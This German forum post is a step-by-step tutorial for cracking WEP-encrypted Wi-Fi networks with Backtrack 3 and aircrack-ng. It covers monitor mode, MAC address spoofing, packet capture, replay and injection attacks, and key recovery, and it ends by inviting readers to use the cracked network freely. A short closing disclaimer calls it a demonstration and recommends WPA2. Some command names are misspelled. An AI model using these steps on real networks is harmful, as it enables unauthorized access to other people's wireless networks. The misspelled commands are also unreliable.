Anleitung: WEP WLAN cracken mit Backtrack BootCD 3

Thema ist geschlossen!
Thema ist geschlossen!
#0
20.08.2008, 21:55
Member
Avatar Laserpointa

Beiträge: 2161
#1 Achtung! Anleitung: WEP WLAN cracken mit Backtrack BootCD 3

Dieser Artikel erklärt wie man ein 64bit oder 128bit WEP WLAN Netzwerk wie es auf vielen WIFI Access Points und Routern zu finden ist mit Backtrack, einer Live-Linux-Distribution knackt. Die grundlegende Theorie ist, dass wir eine Verbindung zu einem Access Point mit einer WEP-Verschlüsselung wollen, aber den Schlüssel nicht wissen. Wir attackieren den WLAN Router, so dass weitere Datenpakete generiert, anhand derer wir den WEP-Schlüssel entschlüsseln können. Ich habe diese Technik auf einem IBM Thinkpad x60 und einem Acer 5672 getestet und die WIFI-Chipsätze auf diesen Computern funktionieren zuverlässig!

Anforderungen:
• Backtrack 3 auf CD oder USB
• Computer mit kompatibler 802.11 WLAN Karte
• Wireless Access point oder WIFI Router der WEP Verschlüsselung verwendet

Ich setze vorraus, das Du Backtrack 3 heruntergeladen und damit gebootet hast. Falls Du das noch nicht hinbekommen hast empfehle ich das WEP Key cracken lieber zu lassen.
Wenn Backtrack geladen ist öffne eine Shell bzw. Kommandozeilenfenster und folge dieser Anleitung:

Vorbereiten der WiFi Karte
Zuerst müssen wir den "Monitor Modus" Deiner WLAN Karte aktivieren. Wenn Deine Karte ein Modell der Intel® PRO/Wireless 3945ABG Chipset Reihe ist starte bitte mit folgenden Befehlen:

modprobe -r iwl3945
modprobe ipwraw

^diese Befehle aktivieren den Monitor Modus des WLAN Chipsatzes Deines Computers.

Als nächstes müssen wir Deine WLAN Karte anhalten um sie danach für den Monitor Modus vorzubereiten:

iwconfig

Bitte notiere Dein WLAN Adapter Namen und stoppe den Adapter mit folgendem Befehl:

airmon-ng stop [device]

dann

ifconfig down [interface]

Nun ändern wir die MAC Adresse Deines WLAN Adapters:

macconfig --mac 00:11:22:33:44:66 [device]

Nun ist es Zeit den Monitor Modus Deiner Karte zu starten:

airmon-ng start [device]




Attackieren des Netzwerkes

Nun müssen wir ein geeignetes WEP Netzwerk auswählen, welches wir gerne entschlüsseln möchten:

airodump-ng [device]



Bitte notiere die MAC Adresse (BSSID), Channel (CH) und Name (ESSID) des zu entschlüsselnden WEP Ziel Netzwerkes. Nun müssen wir Daten aus dem Netz protokollieren um diese zu entschlüsseln:

airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]




^ der oberere Befehl sammelt Daten die in der Datei network.out gesammelt werden. Mit dieser Datei wird später das WEP Crack Programm gefüttert, wenn wir genügend Daten gesammelt haben.

Bitte öffne ein anderes Kommandozeilenfenster und lass das vorherige Fenster offen und weiter laufen. Nun generieren wir ein paar Fake-Packets die wir zu dem zu crackenden Netzwerk senden um den Daten Output bzw. das sammeln der Daten zu steigern. Teste das WLAN Netzwerk mit dem folgenden Befehl:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]



Dieser Befehl erscheint erfolgreich, sodass wir nun genügend Packete generieren um das den WEP Schlüssel zu cracken.

Tippe:

airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]



Dieser Befehl animiert den WLAN Router genügend Packete hinaus zu senden die wir für das cracken des WEP Keys verwenden können. Bitte prüfe Dein aerodump-ng Kommandozeilenfenster und Du solltest sehen das sich die "Daten" Sektion mit Packeten füllt.



Nachdem Du ca 10.000 - 20.000 Packete gesammelt hast können wir mit dem entschlüsseln des WEP Schlüssels beginnen. Wenn es keine anderen Hosts in dem Ziel Netzwerk gib kannst Du das WEP Netzwerk möglichweise mit folgendem Befehl zum generieren von Packeten animieren:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]



Wenn Du genügend Packete hast, kannst Du diese mit folgendem Befehl entschlüsseln:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap

Die “-n 128" bezeichnen den 128-bit WEP Schlüssel. Falls das entschlüsseln nicht funktioniert versuche bitte einen 64-bit Schlüssel indem Du den Wert von N zu 64 änderst.



Wenn der WEP Schüssel gecrackt erscheint folgender Key.
Bitte entferne die : (Doppelpunkte) von dem Ergebniss und freue Dich über den geknackten WEP Schlüssel mit dem Du das Netzwerk nun frei verwenden kannst ;)

Diese Anleitung dient zur Demonstration für Netzwerkuser um ihnen zu zeigen, dass die Verwendung von WEP bei WLAN Routern keine gute Idee ist.
Ich empfehle stets den WPA2 Schlüssel für Dein Netzwerk - viel Glück!

Greetz Lp
Dieser Beitrag wurde am 23.08.2008 um 15:47 Uhr von Laserpointa editiert.
Seitenanfang Seitenende